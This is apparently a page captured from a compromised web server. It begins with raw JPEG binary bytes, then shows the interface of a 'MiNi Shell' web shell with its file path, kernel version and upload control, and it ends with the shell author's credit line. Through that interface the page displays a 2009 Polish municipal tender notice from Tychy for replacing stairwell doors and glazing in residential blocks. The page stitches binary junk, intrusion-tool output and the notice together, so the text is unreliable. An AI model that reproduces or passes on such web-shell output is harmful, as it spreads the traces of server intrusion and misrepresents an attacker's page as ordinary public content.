JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090605/180660-N-2009.html

<p class="kh_header"><b>Tychy: Wymiana stolarki drzwiowej zewnętrznej i przeszkleń na klatkach schodowych
w budynkach mieszkalnych - wielorodzinnych w Tychach</b><br>
<b>Numer ogłoszenia: 180660 - 2009; data zamieszczenia: 05.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka  Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki drzwiowej zewnętrznej i przeszkleń na klatkach schodowych
w budynkach mieszkalnych - wielorodzinnych w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest wykonanie robót budowlanych w zakresie:
  a) wymiany stolarki drzwiowej drewnianej jedno i dwuskrzydłowej na drzwi z PCV do klatek
      schodowych wraz z robotami towarzyszącymi w budynkach mieszkalnych-wielorodzinnych,
      przy ul. Batorego 59 - 67, Brzozowej 7 - 9, Budowlanych 48 - 52, 54 - 56
      administrowanych przez Rejon Obsługi Mieszkańców Nr II w Tychach ;
  b) wymiana przeszkleń na klatkach schodowych wraz z robotami towarzyszącymi w budynku
      mieszkalnym-wielorodzinnym, przy ul. Honoraty 60 i 62, administrowanych przez 
      Rejon Obsługi Mieszkańców Nr V w Tychach 

      z podziałem na 2 części zwane dalej zadaniami, tj.:   

        Zadanie Nr 1 - Wymiana stolarki drzwiowej zewnętrznej klatek schodowych w budynkach
                               mieszkalnych - wielorodzinnych, administrowanych przez Rejon Obsługi
                               Mieszkańców Nr II w Tychach 

        Zadanie Nr 2 - Wymiana przeszkleń na klatkach schodowych w budynku 
                               mieszkalnym-wielorodzinnym, administrowanym przez Rejon Obsługi
                               Mieszkańców Nr V w Tychach 

     2. Zakres robót obejmuje m.in.:
    
 dla Zadania Nr 1:
- demontaż starej stolarki drzwiowej ;
- montaż nowej stolarki drzwiowej z kompletem samozamykaczy i elektromagnesami ;
- malowanie ościeży wewnętrznych i zewnętrznych ;
- roboty towarzyszące ;
     
Wymagania i parametry techniczne stolarki drzwiowej w danym budynku:
1) przy ul. Batorego 59 - 67 
- drzwi dwuskrzydłowe - 7szt. ;
- kolor brąz ;
- w górnym panelu drzwi szyba bezpieczna wąska pionowa o wymiarach 0,70x0,30m ;
- dolny panel - wypełnienie ;

2) przy ul. Brzozowej 7 - 9
- drzwi dwuskrzydłowe - 2szt. ;
- kolor brąz ;
- wypełnienie z przeszkleniem 1/3 skrzydła ;

3) Budowlanych 48 - 52
- kolor brąz ;
- wypełnienie z przeszkleniem 1/3 skrzydła - 2szt. ;
- drzwi dwuskrzydłowe w klatce nr 48, 52 ;

4) Budowlanych 54 - 56
- drzwi jednoskrzydłowe - 2szt. ;
- kolor brąz ;
- wypełnienie z przeszkleniem 1/2 skrzydła ;

Szczegółowy zakres robót określa przedmiar robót.
Przedmiar robót oraz specyfikacja technicznego wykonania i odbioru robót , stanowią załączniki do SIWZ.  

Przedmiot  zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania niniejszego zamówienia w zakresie rzeczowo - ilościowym określonym w z załączonym przedmiarze robót i specyfikacją technicznego wykonania i odbioru robót.
      
dla Zadania Nr 2:
- demontaż ślusarki okiennej ;
- wymurowanie ścianek osłonowych z bloczków z betonu komorowego ;
- demontaż i utylizacja płyt acekolowych (azbestowych) ;
- ocieplenie ścian zewnętrznych w technologii lekko - mokrej ;
- wymiana obróbek blacharskich ;
- montaż okien z PCV ;
- wymiana drzwi stalowych na aluminiowe ;
- roboty malarskie ;
- uzupełnienie tynków na elewacji ;
- wywóz i utylizacja gruzu i złomu ;

Szczegółowy zakres robót określa przedmiar robót.
Przedmiar robót, projekt budowlany (z Rysunkami) oraz specyfikacja technicznego wykonania 
i odbioru robót, stanowią załączniki do SIWZ.  

Przedmiot  zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania niniejszego zamówienia w zakresie rzeczowo - ilościowym określonym w z załączonym przedmiarze robót, zgodnie z projektem budowlanym i specyfikacją technicznego wykonania i odbioru robót.
     
    3. Zamawiający dopuszcza możliwość zastosowania innych materiałów niż podane w
        projekcie  budowlanym i przedmiarze robót, pod warunkiem zapewnienia parametrów nie
        gorszych niż określone w dokumentacji projektowej i przedmiarze ( materiały
        równoważne). 

   4.  Wykonawca, który posłuży się materiałami równoważnymi jest zobowiązany wykazać, że
        spełniają one wymagania określone przez Zamawiającego w dokumentacji projektowej i
        przedmiarze robót tzn. dołączyć do oferty aktualne aprobaty techniczne, certyfikaty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.44.30.00-4, 45.44.21.00-8, 45.41.00.00-4, 45.26.25.22-6, 45.26.26.60-5, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości: 

           dla Zadania Nr 1: 1 300,00 zł

           dla Zadania Nr 2: 2 800,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków:    
O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone na podstawie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164, poz. 1163, 
Nr 170, poz. 1217 i Nr 227, poz.1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, 
poz. 1058), tj.:  
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek
  posiadania takich uprawnień; 
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do
  wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału
  technicznego i osób zdolnych do wykonania zamówienia; 
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp., 
oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
                                
Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:
1.  Wykonawca wraz z ofertą składa następujące oświadczenia i dokumenty: 
1)  oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
      stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4  ustawy - Pzp. 
    - wzór druku oświadczenia stanowi załącznik do specyfikacji,
 (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)
2)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do ewidencji
     działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji
     działalności gospodarcze - wystawiony  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ;  
3)	 aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu
     Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, 
     że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,
     lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
     płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej niż 3
     miesiące przed upływem terminu składania ofert ;
(W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
 przedmiotowe dokumenty wymienione w punkcie 2) i 3) muszą być złożone dla każdego z nich).
4)  aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - o wartości ubezpieczenia nie mniejszej niż:
dla Zadania Nr 1 : 45 000,00 zł
dla Zadania Nr 2 : 90 000,00 zł ;
    Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN ,Zamawiający przeliczy na PLN, przyjmując do
    przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez Narodowy Bank Polski.
  (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  
   Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z Wykonawców)  
5)  wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o
      udzielenie zamówienia publicznego, a jeżeli okres działalności jest krótszy- w tym okresie wykonał z należytą
      starannością roboty, odpowiadające swoim rodzajem i wartością robotą budowlanym stanowiącym przedmiot
      zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania w którym - NALEŻY  WYKAZAĆ :
DLA ZADANIA Nr 1 - co najmniej dwie roboty zrealizowane w ramach odrębnych umów, o charakterze podobnym do przedmiotu zamówienia, tj. roboty dotyczące wymiany stolarki i o wartości każdej z tych robót nie mniejszej niż 20 000,00 zł (brutto)

Do oferty należy załączyć:
- wykaz wykonanych robót zrealizowanych w ramach odrębnych umów, polegających na wykonaniu robót o
  charakterze podobnym do przedmioty zamówienia tj. roboty dotyczące wymiany stolarki i o wartości każdej z tych
  robót nie mniejszej  niż 20 000,00 zł (brutto) oraz dokumenty potwierdzające, że roboty te zostały
  wykonane należycie. 

Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 
- W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców
DLA ZADANIA Nr 2 - co najmniej dwie roboty zrealizowane w ramach odrębnych umów, o charakterze podobnym do przedmiotu zamówienia (tj. roboty dotyczące wymiany stolarki, roboty tynkarsko-murarskie i malarskie) i o wartości każdej z tych robót nie mniejszej niż 45 000,00 zł (brutto)

Do oferty należy załączyć:
- wykaz wykonanych robót zrealizowanych w ramach odrębnych umów, polegających na wykonaniu robót o
  charakterze podobnym do przedmioty zamówienia i o wartości każdej z tych robót nie mniejszej  niż 45 000,00 zł
 (brutto) oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie. 
Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 
- W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców
6) dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu zamówienia, w
     szczególności uprawnionymi do sprawowania samodzielnych funkcji technicznych w budownictwie w
     specjalnościach niezbędnych do projektowania i wykonania robót budowlanych art. 12 i 13 ustawy z dnia 7 lipca
     1994 r. - Prawo Budowlane (Dz. U. z 2006r., Nr 156, poz.118 z późn. zmianami), którzy są członkami Polskiej
     Izby Inżynierów Budownictwa (art.6 ustawy z dnia 15 grudnia 2000r. samorządach zawodowych,
     architektów, inżynierów budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42 z późn. zm.), tj.: 
     osobą / osobami posiadającymi uprawnienia budowlane w specjalności konstrukcyjno 
     - budowlanej - dotyczy Zadania nr 1 i 2

Do oferty należy załączyć:
- kserokopię uprawnień budowlanych w specjalności konstrukcyjno - budowlanej oraz aktualne zaświadczenie
   wydane przez właściwą Izbę Inżynierów Budownictwa. 
(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców)
7) Posiada pozwolenie na utylizację i likwidacje azbestu (Wykonawca bądź podwykonawca), zgodne z
     Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 kwietnia 2004 r. w sprawie sposobu i warunków
     bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. Nr 71, poz. 649) 
     - dot. Zadania Nr 2
     Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605,
      z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu
     o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast
     dokumentów, o których mowa powyżej w pkt. 1., p.pkt. 2) i 3) - składa dokument lub dokumenty wystawione
     w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał
          przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w
          całości wykonania decyzji właściwego organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie
     wydaje się dokumentów, o których mowa w punkcie w pkt. 1., p.pkt. 2) i 3) zastępuje się je dokumentem
     zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo
     organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w
     którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pok. 20 - cena 30 zł (brutto).
Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2009 godzina 11:00, miejsce: Miejsce składania ofert: Miejski Zarząd Budynków Mieszkalnych w Tychach, ul. Filaretów 31 -SEKRETARIAT - pokój nr 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Wymiana stolarki drzwiowej zewnętrznej klatek schodowych w budynkach
                               mieszkalnych - wielorodzinnych, administrowanych przez Rejon Obsługi
                               Mieszkańców Nr II w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
    
 dla Zadania Nr 1:
- demontaż starej stolarki drzwiowej ;
- montaż nowej stolarki drzwiowej z kompletem samozamykaczy i elektromagnesami ;
- malowanie ościeży wewnętrznych i zewnętrznych ;
- roboty towarzyszące ;
     
Wymagania i parametry techniczne stolarki drzwiowej w danym budynku:
1) przy ul. Batorego 59 - 67 
- drzwi dwuskrzydłowe - 7szt. ;
- kolor brąz ;
- w górnym panelu drzwi szyba bezpieczna wąska pionowa o wymiarach 0,70x0,30m ;
- dolny panel - wypełnienie ;

2) przy ul. Brzozowej 7 - 9
- drzwi dwuskrzydłowe - 2szt. ;
- kolor brąz ;
- wypełnienie z przeszkleniem 1/3 skrzydła ;

3) Budowlanych 48 - 52
- kolor brąz ;
- wypełnienie z przeszkleniem 1/3 skrzydła - 2szt. ;
- drzwi dwuskrzydłowe w klatce nr 48, 52 ;

4) Budowlanych 54 - 56
- drzwi jednoskrzydłowe - 2szt. ;
- kolor brąz ;
- wypełnienie z przeszkleniem 1/2 skrzydła ;

Szczegółowy zakres robót określa przedmiar robót.
Przedmiar robót oraz specyfikacja technicznego wykonania i odbioru robót , stanowią załączniki do SIWZ.  

Przedmiot  zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania niniejszego zamówienia w zakresie rzeczowo - ilościowym określonym w z załączonym przedmiarze robót i specyfikacją technicznego wykonania i odbioru robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.31-1, 45.41.00.00-4, 45.44.21.00-8, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Wymiana przeszkleń na klatkach schodowych w budynku 
                               mieszkalnym-wielorodzinnym, administrowanym przez Rejon Obsługi
                               Mieszkańców Nr V w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
dla Zadania Nr 2:
- demontaż ślusarki okiennej ;
- wymurowanie ścianek osłonowych z bloczków z betonu komorowego ;
- demontaż i utylizacja płyt acekolowych (azbestowych) ;
- ocieplenie ścian zewnętrznych w technologii lekko - mokrej ;
- wymiana obróbek blacharskich ;
- montaż okien z PCV ;
- wymiana drzwi stalowych na aluminiowe ;
- roboty malarskie ;
- uzupełnienie tynków na elewacji ;
- wywóz i utylizacja gruzu i złomu ;

Szczegółowy zakres robót określa przedmiar robót.
Przedmiar robót, projekt budowlany (z Rysunkami) oraz specyfikacja technicznego wykonania 
i odbioru robót, stanowią załączniki do SIWZ.  

Przedmiot  zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania niniejszego zamówienia w zakresie rzeczowo - ilościowym określonym w z załączonym przedmiarze robót, zgodnie z projektem budowlanym i specyfikacją technicznego wykonania i odbioru robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.31-1, 45.42.11.32-8, 45.44.30.00-4, 45.44.21.00-8, 45.41.00.00-4, 45.26.25.22-6, 45.26.26.60-5, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com